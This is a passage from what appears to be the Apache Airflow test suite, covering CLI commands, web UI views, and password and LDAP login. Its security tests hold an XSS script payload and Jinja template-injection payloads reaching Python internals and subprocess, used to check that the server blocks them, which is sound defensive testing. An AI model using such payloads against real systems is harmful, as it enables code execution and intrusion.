'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
